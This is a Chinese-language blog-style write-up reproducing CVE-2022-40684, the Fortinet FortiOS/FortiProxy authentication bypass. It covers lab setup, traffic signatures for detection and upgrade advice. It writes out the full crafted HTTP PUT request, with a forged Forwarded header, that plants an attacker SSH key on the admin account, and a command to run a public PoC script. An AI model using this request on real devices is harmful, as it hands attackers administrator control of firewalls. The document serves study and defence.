CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现

猪猪俠

0x01 声明：

仅供学习参考使用，请勿用作违法用途，否则后果自负。
0x02 简介：

Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。
0x03 漏洞概述：

近日，Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞（CVE-2022-40684），该漏洞可能允许攻击者在易受攻击的设备上执行未经授权的操作，攻击者通过向易受攻击的目标发送特制的 HTTP 或 HTTPS 请求进行绕过身份认证以管理员身份在控制面板中执行任意操作。
0x04 影响版本：

7.0.0 <= FortiOS <= 7.0.6
7.2.0 <= FortiOS <= 7.2.1
7.0.0 <= FortiProxy <= 7.0.6
FortiProxy = 7.2.0
FortiSwitchManager = 7.0.0
FortiSwitchManager = 7.2.0
0x05 环境搭建：

FortiGate虚拟化环境

下载FortiGate-VM：

（https://pan.baidu.com/s/1eCcjGwqfHqklEFfSurTk7Q?pwd=2jx1）
导入OVF模板：

解压FGT_VM64-v7.2.1.F-build1254-FORTINET.out.ovf.zip，选择红框内容导入。


登录后台：

admin 无密码直接回车（会提示修改密码）
配置IP：

config system interfaceedit port1set mode staticset ip 192.168.0.100 255.255.255.0append allowaccess httpnextend
配置网关：（获取试用授权）

config router staticedit 1set device port1set gateway 192.168.0.254nextend

配置DNS：（获取试用授权）

config system dnsset primary 114.114.114.114set secondary 235.5.5.5end
开启Rest API：（方便后期查看攻击日志）

config log settingset rest-api-set enableset rest-api-get enableend
登录web页面：

admin 后台设置的密码





生成SSH—KEY(后期要使用)












0x06 漏洞复现：

Burp：

修改请求内容：


PUT /api/v2/cmdb/system/admin/admin HTTP/1.1Host: 192.168.119.156User-Agent: Report RunnerAccept-Encoding: gzip, deflate, brAccept: */*Connection: keep-aliveForwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"Content-Length: 409Content-Type:application/json {"ssh-public-key1": "\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0/ljPV1Bj2kDxivuK7t4Y8MbIYegGvXza7cRwW9uI49eXccQTJr8kRvwUO5Stf01N5wjgZWYXZEAR3kRRCY/UHF6mZT41mCusbJX/IKrRTcmvwWnDysZuFD3YUZuuQvgWiulvOLczUcUXuRwRQj5gUNdFnbB1M/3t0sg2URXPqEqtNxfCQGpeUswpiGPQRCwU6fW0j5GpsX8CtOk/xagvZDRbBTJCqTR61iUxMO/6c82IxQxVb7Fuf6yvwcQhEPcRJ0YPXj3MeCOZQl/n49q7BQeiUqd+4IOrAqoZ08itGHm1iCsgOhacblcV7z5bnf81Z2wJpH5ja626mwxG2ZD/Q==\""}


Xshell连接:

输入用户名admin ，选择 Key。




利用POC：

下载：

https://github.com/horizon3ai/CVE-2022-40684
利用：

Python3 CVE-2022-40684.py -t 192.168.119.156 -u admin -k ~/.ssh/id_rsa.pub








0x07 流量分析：

请求头特征：

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1User-Agent: Report RunnerForwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"Data：{"ssh-public-key1": "\"ssh-rsa xxxx\""}


响应体特征：

HTTP/1.1 500 Internal Server Error date:"cli_error":"SSH key is good.


0x08 修复建议：

官方已经针对漏洞发布了安全更新，用户可升级至安全版本：
使用 7.0.0 <= FortiOS <= 7.0.6 的用户升级至 7.0.7 版本
使用 7.2.0 <= FortiOS <= 7.2.1 的用户升级至 7.2.2 版本
使用 7.0.0 <= FortiProxy <= 7.0.6 的用户升级至 7.0.7 版本
使用 FortiProxy = 7.2.0 的用户升级至 7.2.1 版本
下载地址如下：
https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/832438/upgrade-information
https://docs.fortinet.com/document/fortiproxy/7.2.1/release-notes/587449/product-integration-and-support

钱叔叔

非常好，顶一下